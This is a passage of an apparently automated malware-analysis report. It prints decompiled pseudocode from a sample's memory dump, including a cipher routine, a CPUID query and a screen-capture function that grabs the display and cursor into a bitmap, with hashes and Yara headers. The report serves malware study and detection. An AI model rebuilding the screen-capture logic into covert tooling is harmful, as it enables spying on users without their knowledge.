						 *((intOrPtr*)(_t220 + 0x80)) =  *((intOrPtr*)(_t294 + 0x74));
						_t227 = ( *( *_t294 + 2) & 3) << 0x00000004 |  *(_t220 + 0x308) & 0x0000ffcf;
						 *(_t220 + 0x308) = _t227;
						_t302 = ( *( *_t294 + 3) & 1) << 0x0000000a | _t227 & 0x0000fbff;
						 *(_t220 + 0x308) = _t302;
						 *((char*)(_t220 + 0x315)) =  *((intOrPtr*)(_t294 + 0x60));
						_t273 = ( *(_t294 + 0x5e) >> 0x00000002 & 1) << 0x00000008 |  *(_t220 + 0x30a) & 0x0000feff;
						 *(_t220 + 0x30a) = _t273;
						_t232 = ( *(_t294 + 0x5e) >> 0x00000003 & 1) << 0x00000009 | _t273 & 0x0000fdff;
						 *(_t220 + 0x30a) = _t232;
						_t276 = ( *(_t294 + 0x5e) >> 0x00000004 & 1) << 0x0000000b | _t232 & 0x0000f7ff;
						 *(_t220 + 0x30a) = _t276;
						_t235 = ( *(_t294 + 0x5e) >> 0x00000001 & 1) << 0x00000007 | _t276 & 0x0000ff7f;
						 *(_t220 + 0x30a) = _t235;
						 *(_t220 + 0x30a) = ( *(_t294 + 0x5e) >> 0x00000005 & 1) << 0x0000000c | _t235 & 0x0000efff;
						 *((short*)(_t220 + 0x31c)) =  *((intOrPtr*)(_t294 + 0x62));
						 *((short*)(_t220 + 0x31e)) =  *((intOrPtr*)(_t294 + 0x64));
						 *((short*)(_t220 + 0x322)) =  *((intOrPtr*)(_t294 + 0x66));
						_t279 = ( *(_t294 + 0x5d) >> 0x00000004 & 1) << 0x00000002 | _t302 & 0x0000fffb;
						 *(_t220 + 0x308) = _t279;
						_t240 = ( *(_t294 + 0x5d) >> 0x00000005 & 1) << 0x00000003 | _t279 & 0x0000fff7;
						 *(_t220 + 0x308) = _t240;
						_t282 = ( *(_t294 + 0x5d) & 1) << 0x00000006 | _t240 & 0x0000ffbf;
						 *(_t220 + 0x308) = _t282;
						_t243 = ( *(_t294 + 0x5d) >> 0x00000001 & 1) << 0x00000007 | _t282 & 0x0000ff7f;
						 *(_t220 + 0x308) = _t243;
						_t285 = ( *(_t294 + 0x5d) >> 0x00000002 & 1) << 0x00000008 | _t243 & 0x0000feff;
						 *(_t220 + 0x308) = _t285;
						_t246 = ( *(_t294 + 0x5d) >> 0x00000003 & 1) << 0x00000009 | _t285 & 0x0000fdff;
						 *(_t220 + 0x308) = _t246;
						 *(_t220 + 0x308) =  *(_t294 + 0x5d) >> 0x00000006 & 0x000000ff | _t246 & 0x0000fffc;
						_t250 = ( *(_t294 + 0x5e) >> 0x00000006 & 1) << 0x00000003 |  *(_t220 + 0x30c) & 0x0000fff7;
						 *(_t220 + 0x30c) = _t250;
						_t288 = ( *(_t294 + 0x5e) >> 0x00000007 & 0x000000ff) << 0x00000004 | _t250 & 0x0000ffef;
						 *(_t220 + 0x30c) = _t288;
						_t253 = ( *(_t294 + 0x5f) & 1) << 0x00000006 | _t288 & 0x0000ffbf;
						 *(_t220 + 0x30c) = _t253;
						_t291 = 1;
						 *(_t220 + 0x30c) = ( *(_t294 + 0x61) >> 0x00000005 & 1) << 0x0000000f | _t253 & 0x00007fff;
						 *((intOrPtr*)(_t220 + 0x124)) =  *((intOrPtr*)(_t294 + 0x24));
						 *((intOrPtr*)(_t220 + 0x128)) =  *((intOrPtr*)(_t294 + 0x28));
						 *((intOrPtr*)(_t220 + 0x12c)) =  *((intOrPtr*)(_t294 + 0x2c));
						 *((intOrPtr*)(_t220 + 0x130)) =  *((intOrPtr*)(_t294 + 0x30));
						 *((intOrPtr*)(_t220 + 0x148)) =  *((intOrPtr*)(_t294 + 0x34));
						 *((intOrPtr*)(_t220 + 0x15c)) =  *((intOrPtr*)(_t294 + 0x38));
						 *((intOrPtr*)(_t220 + 0x160)) =  *((intOrPtr*)(_t294 + 0x3c));
						 *((intOrPtr*)(_t220 + 0x14c)) =  *((intOrPtr*)(_t294 + 0x40));
						 *(_t220 + 0x150) =  *(_t220 + 0x150) ^ ( *(_t220 + 0x150) ^  *(_t294 + 0x44)) & 0x0000007f;
						 *(_t220 + 0x150) = ( *(_t294 + 0x44) ^  *(_t220 + 0x150)) & 0x0000007f ^  *(_t294 + 0x44);
						 *((intOrPtr*)(_t220 + 0x154)) =  *((intOrPtr*)(_t294 + 0x48));
						 *((intOrPtr*)(_t220 + 0x158)) =  *((intOrPtr*)(_t294 + 0x4c));
						_t305 =  *(_t294 + 0x54);
						if(_t305 == 0) {
							E0042B710(_t294,  *(_t220 + 4), 0, 0x158);
							_t291 = 1;
						} else {
							_t263 = 0x56;
							memcpy( *(_t220 + 4), _t305, _t263 << 2);
							_t294 = _v8;
						}
						if(( *(_t220 + 0x308) & 0x00000030) != 0x30) {
							_t291 = E00412C42(_t220);
						}
						_t102 = _t291;
						 *((intOrPtr*)(_t220 + 0x88)) =  *((intOrPtr*)(_t294 + 0x6c));
						 *((intOrPtr*)(_t220 + 0x8c)) =  *((intOrPtr*)(_t294 + 0x70));
						 *((char*)(_t220 + 0x20e)) =  *((intOrPtr*)(_t294 + 0x5c));
					}
				}
				return _t102;
			}




























                                            0x00412cf0
                                            0x00412cf3
                                            0x00412cf6
                                            0x00412cf8
                                            0x00412cfa
                                            0x00412cff
                                            0x004130e0
                                            0x00412d17
                                            0x00412d17
                                            0x00412d1b
                                            0x00412d1d
                                            0x00412d1d
                                            0x00412d27
                                            0x00412d2e
                                            0x00412d34
                                            0x00412d3d
                                            0x00412d41
                                            0x00412d4f
                                            0x00412d59
                                            0x00412d65
                                            0x00412d6e
                                            0x00412d77
                                            0x00412d95
                                            0x00412d9a
                                            0x00412db6
                                            0x00412db9
                                            0x00412dc3
                                            0x00412dea
                                            0x00412ded
                                            0x00412e0c
                                            0x00412e0f
                                            0x00412e2e
                                            0x00412e31
                                            0x00412e4f
                                            0x00412e52
                                            0x00412e77
                                            0x00412e85
                                            0x00412e90
                                            0x00412e9b
                                            0x00412eb4
                                            0x00412ebc
                                            0x00412ed7
                                            0x00412eda
                                            0x00412ef6
                                            0x00412ef9
                                            0x00412f17
                                            0x00412f1a
                                            0x00412f39
                                            0x00412f3c
                                            0x00412f5b
                                            0x00412f5e
                                            0x00412f77
                                            0x00412f97
                                            0x00412f9a
                                            0x00412fb7
                                            0x00412fba
                                            0x00412fd6
                                            0x00412fdb
                                            0x00412fe2
                                            0x00412ffb
                                            0x00413005
                                            0x0041300e
                                            0x00413017
                                            0x00413020
                                            0x00413029
                                            0x00413032
                                            0x0041303b
                                            0x00413044
                                            0x00413055
                                            0x0041306a
                                            0x00413073
                                            0x0041307c
                                            0x00413082
                                            0x00413087
                                            0x004130a0
                                            0x004130aa
                                            0x00413089
                                            0x0041308e
                                            0x0041308f
                                            0x00413091
                                            0x00413091
                                            0x004130b6
                                            0x004130bf
                                            0x004130bf
                                            0x004130c4
                                            0x004130c6
                                            0x004130cf
                                            0x004130d8
                                            0x004130d8
                                            0x00412d2e
                                            0x004130ea

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad5ac23f1154e8c11c26b425167be26b2bb425741feaa44a89101ca565d08f56
                                            • Instruction ID: 74d017d80bec3546e6183cfbe936117a00320f49906bd252bcd7cdd977a192cf
                                            • Opcode Fuzzy Hash: ad5ac23f1154e8c11c26b425167be26b2bb425741feaa44a89101ca565d08f56
                                            • Instruction Fuzzy Hash: 6CB1A239114A929AC701EF29C0913F17BE1FF6A305F1890B9DC98CFB57E3299512EB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041C867, Relevance: .2, Instructions: 195COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E0041C867(void* __ecx, signed int __edx, signed int _a4, void* _a8, unsigned int _a12, void* _a16, int _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v64;
				unsigned int _t115;
				signed int _t146;
				unsigned int _t147;
				unsigned int _t149;
				unsigned int _t150;
				signed int* _t156;
				signed int _t160;
				signed int _t169;
				signed int _t179;

				_v12 = __edx;
				asm("xorps xmm0, xmm0");
				asm("movsd");
				asm("movlpd [ebp-0x1c], xmm0");
				asm("movlpd [ebp-0x14], xmm0");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0041BACE( &_v64,  &_v64);
				_t146 = _a4;
				if(_t146 == 0) {
					L7:
					_t147 = _a12;
					if(_t147 == 0) {
						L15:
						_t179 = _a4;
						_v28 = _v28 ^ (0 << 0x00000020 | _t179) << 0x3;
						_v20 = _v20 ^ (0 << 0x00000020 | _t147) << 0x3;
						_t156 =  &_v32;
						_v32 = _v32 ^ _t179 << 0x00000003;
						_v24 = _v24 ^ _t147 << 0x00000003;
						E0041C724(_t156,  &_v64);
						_push(_t156);
						E0041BACE( &_v32,  &_v32);
						return E0042BC80(_a16,  &_v32, _a20);
					}
					_t183 = _a8;
					if(_a8 == 0) {
						goto L15;
					}
					_t160 = _t147 & 0x0000000f;
					_t115 = _t147 >> 4;
					_v12 = _t160;
					if(_t115 == 0) {
						L13:
						if(_t160 != 0) {
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							E0042BC80( &_v48, _t183, _t160);
							E0041BACE( &_v48,  &_v48);
							_v32 = _v32 ^ _v48;
							_v28 = _v28 ^ _v44;
							_v24 = _v24 ^ _v40;
							_v20 = _v20 ^ _v36;
							E0041C724( &_v32,  &_v64);
						}
						goto L15;
					}
					_t149 = _t115;
					do {
						_push(_t160);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E0041BACE( &_v48,  &_v48);
						_v32 = _v32 ^ _v48;
						_v28 = _v28 ^ _v44;
						_v24 = _v24 ^ _v40;
						_v20 = _v20 ^ _v36;
						_t160 =  &_v32;
						E0041C724(_t160,  &_v64);
						_t183 = _a8 + 0x10;
						_a8 = _a8 + 0x10;
						_t149 = _t149 - 1;
					} while (_t149 != 0);
					_t147 = _a12;
					_t160 = _v12;
					goto L13;
				}
				_t189 = _v12;
				if(_v12 == 0) {
					goto L7;
				}
				_t150 = _t146 >> 4;
				_t169 = _t146 & 0x0000000f;
				_v16 = _t169;
				if(_t150 == 0) {
					L5:
					if(_t169 != 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						E0042BC80( &_v48, _t189, _t169);
						E0041BACE( &_v48,  &_v48);
						_v32 = _v32 ^ _v48;
						_v28 = _v28 ^ _v44;
						_v24 = _v24 ^ _v40;
						_v20 = _v20 ^ _v36;
						E0041C724( &_v32,  &_v64);
					}
					goto L7;
				} else {
					goto L3;
				}
				goto L5;
				L3:
				_push(_t169);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0041BACE( &_v48,  &_v48);
				_v32 = _v32 ^ _v48;
				_v28 = _v28 ^ _v44;
				_v24 = _v24 ^ _v40;
				_v20 = _v20 ^ _v36;
				_t169 =  &_v32;
				E0041C724(_t169,  &_v64);
				_t189 = _v12 + 0x10;
				_v12 = _v12 + 0x10;
				_t150 = _t150 - 1;
				if(_t150 != 0) {
					goto L3;
				} else {
					_t169 = _v16;
					goto L5;
				}
			}























                                            0x0041c876
                                            0x0041c87c
                                            0x0041c87f
                                            0x0041c886
                                            0x0041c88b
                                            0x0041c890
                                            0x0041c891
                                            0x0041c892
                                            0x0041c893
                                            0x0041c898
                                            0x0041c89e
                                            0x0041c94f
                                            0x0041c94f
                                            0x0041c954
                                            0x0041ca0c
                                            0x0041ca0c
                                            0x0041ca1b
                                            0x0041ca1e
                                            0x0041ca21
                                            0x0041ca27
                                            0x0041ca30
                                            0x0041ca33
                                            0x0041ca3b
                                            0x0041ca3e
                                            0x0041ca5c
                                            0x0041ca5c
                                            0x0041c95a
                                            0x0041c95f
                                            0x00000000
                                            0x00000000
                                            0x0041c969
                                            0x0041c96c
                                            0x0041c96f
                                            0x0041c974
                                            0x0041c9c4
                                            0x0041c9c6
                                            0x0041c9cd
                                            0x0041c9d0
                                            0x0041c9d1
                                            0x0041c9d2
                                            0x0041c9d7
                                            0x0041c9e3
                                            0x0041c9ee
                                            0x0041c9f4
                                            0x0041c9fa
                                            0x0041ca00
                                            0x0041ca07
                                            0x0041ca07
                                            0x00000000
                                            0x0041c9c6
                                            0x0041c976
                                            0x0041c978
                                            0x0041c980
                                            0x0041c983
                                            0x0041c984
                                            0x0041c985
                                            0x0041c986
                                            0x0041c987
                                            0x0041c992
                                            0x0041c998
                                            0x0041c99e
                                            0x0041c9a4
                                            0x0041c9a8
                                            0x0041c9ab
                                            0x0041c9b3
                                            0x0041c9b6
                                            0x0041c9b9
                                            0x0041c9b9
                                            0x0041c9be
                                            0x0041c9c1
                                            0x00000000
                                            0x0041c9c1
                                            0x0041c8a4
                                            0x0041c8a9
                                            0x00000000
                                            0x00000000
                                            0x0041c8b1
                                            0x0041c8b4
                                            0x0041c8b7
                                            0x0041c8bc
                                            0x0041c907
                                            0x0041c909
                                            0x0041c910
                                            0x0041c913
                                            0x0041c914
                                            0x0041c915
                                            0x0041c91a
                                            0x0041c926
                                            0x0041c931
                                            0x0041c937
                                            0x0041c93d
                                            0x0041c943
                                            0x0041c94a
                                            0x0041c94a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0041c8be
                                            0x0041c8c6
                                            0x0041c8c9
                                            0x0041c8ca
                                            0x0041c8cb
                                            0x0041c8cc
                                            0x0041c8cd
                                            0x0041c8d8
                                            0x0041c8de
                                            0x0041c8e4
                                            0x0041c8ea
                                            0x0041c8ee
                                            0x0041c8f1
                                            0x0041c8f9
                                            0x0041c8fc
                                            0x0041c8ff
                                            0x0041c902
                                            0x00000000
                                            0x0041c904
                                            0x0041c904
                                            0x00000000
                                            0x0041c904

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5eabc9d13506a84790c36c999c10fd4b91238822d1c704993f6e5abf5ad8c99e
                                            • Instruction ID: d9872de51978568a0d777933962e1099b06f059ef14463942712b504b9302f05
                                            • Opcode Fuzzy Hash: 5eabc9d13506a84790c36c999c10fd4b91238822d1c704993f6e5abf5ad8c99e
                                            • Instruction Fuzzy Hash: BB612B31E0020A9BDF09DFB9D8819EFB7F6EF8C314F14852AE521BB250D7746A448B94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00410E32, Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00410E32(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v32;
				void* _v64;
				void* _v80;
				char _v96;
				void* __ebx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr* _t51;

				_t41 = __edx;
				asm("movaps xmm0, [0x45b6e0]");
				_push(_t31);
				_t43 = 0x80000000;
				_v16 = __ecx;
				_v8 = 0x80000000;
				_push(_t31);
				asm("cpuid");
				asm("movups [ebp-0x1c], xmm0");
				_t33 =  &_v32;
				 *_t33 = 0x80000000;
				 *((intOrPtr*)(_t33 + 4)) = _t31;
				 *((intOrPtr*)(_t33 + 8)) = 0;
				 *((intOrPtr*)(_t33 + 0xc)) = __edx;
				_t34 = _v32;
				_v12 = _t34;
				E0042B710(0x80000000,  &_v96, 0, 0x40);
				if(_t34 >= 0x80000000) {
					do {
						_push(_t34);
						asm("cpuid");
						_t51 = _t34;
						_t34 =  &_v32;
						 *_t34 = _t43;
						 *((intOrPtr*)(_t34 + 4)) = _t51;
						 *((intOrPtr*)(_t34 + 8)) = 0;
						 *((intOrPtr*)(_t34 + 0xc)) = _t41;
						if(_t43 != 0x80000002) {
							if(_t43 != 0x80000003) {
								if(_t43 == 0x80000004) {
									goto L7;
								}
							} else {
								goto L7;
							}
						} else {
							L7:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t43 = _v8;
						}
						_t43 = _t43 + 1;
						_v8 = _t43;
					} while (_t43 <= _v12);
				}
				E0040207E(_t34, _v16,  &_v96);
				return _v16;
			}


















                                            0x00410e32
                                            0x00410e38
                                            0x00410e3f
                                            0x00410e42
                                            0x00410e47
                                            0x00410e4c
                                            0x00410e51
                                            0x00410e52
                                            0x00410e56
                                            0x00410e5b
                                            0x00410e5e
                                            0x00410e63
                                            0x00410e68
                                            0x00410e6b
                                            0x00410e6e
                                            0x00410e74
                                            0x00410e77
                                            0x00410e81
                                            0x00410e83
                                            0x00410e87
                                            0x00410e88
                                            0x00410e8a
                                            0x00410e8d
                                            0x00410e90
                                            0x00410e92
                                            0x00410e95
                                            0x00410e98
                                            0x00410ea1
                                            0x00410eae
                                            0x00410ebb
                                            0x00000000
                                            0x00410ebd
                                            0x00410eb0
                                            0x00000000
                                            0x00410eb0
                                            0x00410ea3
                                            0x00410ec0
                                            0x00410ec3
                                            0x00410ec4
                                            0x00410ec5
                                            0x00410ec6
                                            0x00410ec7
                                            0x00410ec7
                                            0x00410eca
                                            0x00410ecb
                                            0x00410ece
                                            0x00410e83
                                            0x00410eda
                                            0x00410ee8

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ca8cc1f6c2740879e35147a1f223d787d40cc1fc5548672c800f60af429036c
                                            • Instruction ID: 4e47a90c7a0f529a0d55f4c54407744852adea2d47083ed98bb4b2b405ca5a7b
                                            • Opcode Fuzzy Hash: 7ca8cc1f6c2740879e35147a1f223d787d40cc1fc5548672c800f60af429036c
                                            • Instruction Fuzzy Hash: 0F216072D002099BCF15CF99C8816DEF7B5EF44310F14C46BE914BB201D2B56A868BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040F0BD, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298windowmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E0040F0BD(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E0040F4EF( *((intOrPtr*)(0x460cf8 + _a4 * 4)));
				_t114 = E0040F53B( *((intOrPtr*)(0x460cf8 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E0040F57C( *((intOrPtr*)(0x460cf8 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020CF(_t194,  &_v80);
												E004020CF(_t194,  &_v168);
												E004022AC(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00401F74( &_v80);
												E004022AC(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00401F74( &_v80);
												_t235 = _a4;
												E004022AC(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00401F74( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402014(_t194, _t194, __eflags,  &_v168);
												E00401F97();
												E00401F97();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E0040207E(_t194, _t194, 0x4554cc);
					L32:
					return _t194;
				}
			}

















































                                            0x0040f0cb
                                            0x0040f0d6
                                            0x0040f0de
                                            0x0040f0e1
                                            0x0040f0ed
                                            0x0040f0ef
                                            0x0040f0fe
                                            0x0040f10b
                                            0x0040f110
                                            0x0040f113
                                            0x0040f118
                                            0x0040f132
                                            0x0040f138
                                            0x0040f13b
                                            0x0040f13d
                                            0x0040f157
                                            0x0040f15d
                                            0x0040f15f
                                            0x0040f178
                                            0x0040f17c
                                            0x0040f187
                                            0x0040f1a7
                                            0x0040f1ad
                                            0x0040f1af
                                            0x00000000
                                            0x00000000
                                            0x0040f1b1
                                            0x0040f1b5
                                            0x0040f1ba
                                            0x0040f1c2
                                            0x0040f1c8
                                            0x0040f1ca
                                            0x0040f1d6
                                            0x0040f1dc
                                            0x0040f1de
                                            0x0040f1f8
                                            0x0040f1f8
                                            0x0040f1fb
                                            0x0040f204
                                            0x0040f20f
                                            0x0040f213
                                            0x0040f219
                                            0x0040f219
                                            0x0040f1de
                                            0x0040f1ca
                                            0x0040f21f
                                            0x0040f222
                                            0x0040f227
                                            0x0040f22d
                                            0x0040f22f
                                            0x00000000
                                            0x0040f235
                                            0x0040f23c
                                            0x0040f242
                                            0x0040f245
                                            0x0040f24b
                                            0x0040f24d
                                            0x0040f24e
                                            0x0040f251
                                            0x0040f254
                                            0x0040f281
                                            0x0040f281
                                            0x0040f28a
                                            0x0040f28b
                                            0x0040f293
                                            0x0040f297
                                            0x0040f298
                                            0x0040f2a1
                                            0x0040f2a7
                                            0x0040f2ae
                                            0x0040f2b6
                                            0x0040f2ba
                                            0x0040f2bd
                                            0x0040f2c0
                                            0x0040f2c7
                                            0x0040f2c9
                                            0x0040f2c9
                                            0x0040f2d5
                                            0x0040f2d9
                                            0x0040f2dd
                                            0x0040f2de
                                            0x0040f2ec
                                            0x0040f2f3
                                            0x0040f2f6
                                            0x0040f2fc
                                            0x0040f2ff
                                            0x0040f301
                                            0x0040f31a
                                            0x0040f320
                                            0x0040f322
                                            0x0040f34f
                                            0x0040f363
                                            0x0040f368
                                            0x0040f373
                                            0x0040f373
                                            0x0040f379
                                            0x0040f37c
                                            0x0040f387
                                            0x0040f395
                                            0x0040f3a4
                                            0x0040f3af
                                            0x0040f3be
                                            0x0040f3c6
                                            0x0040f3cd
                                            0x0040f3dc
                                            0x0040f3e4
                                            0x0040f3eb
                                            0x0040f3fa
                                            0x0040f3fd
                                            0x0040f408
                                            0x0040f413
                                            0x0040f41b
                                            0x00000000
                                            0x0040f41b
                                            0x0040f32d
                                            0x0040f330
                                            0x0040f335
                                            0x0040f33f
                                            0x00000000
                                            0x0040f303
                                            0x0040f303
                                            0x0040f162
                                            0x0040f168
                                            0x0040f16b
                                            0x0040f16d
                                            0x00000000
                                            0x0040f16d
                                            0x0040f301
                                            0x0040f256
                                            0x0040f258
                                            0x0040f259
                                            0x0040f25c
                                            0x0040f25f
                                            0x00000000
                                            0x00000000
                                            0x0040f261
                                            0x0040f263
                                            0x0040f264
                                            0x0040f267
                                            0x0040f26a
                                            0x00000000
                                            0x00000000
                                            0x0040f26e
                                            0x0040f26f
                                            0x0040f272
                                            0x0040f27b
                                            0x0040f27d
                                            0x0040f27e
                                            0x0040f27e
                                            0x00000000
                                            0x0040f27e
                                            0x0040f274
                                            0x0040f277
                                            0x00000000
                                            0x0040f277
                                            0x00000000
                                            0x0040f247
                                            0x0040f22f
                                            0x0040f161
                                            0x0040f161
                                            0x00000000
                                            0x0040f13f
                                            0x0040f146
                                            0x0040f149
                                            0x0040f14b
                                            0x0040f14d
                                            0x0040f14d
                                            0x00000000
                                            0x0040f14d
                                            0x0040f11e
                                            0x0040f11e
                                            0x0040f125
                                            0x0040f422
                                            0x0040f428
                                            0x0040f428

                                            APIs
                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040F0D8
                                            • CreateCompatibleDC.GDI32(00000000), ref: 0040F0E4
                                              • Part of subcall function 0040F4EF: GetMonitorInfoW.USER32(?,?), ref: 0040F50F
                                              • Part of subcall function 0040F53B: GetMonitorInfoW.USER32(?,?), ref: 0040F55B
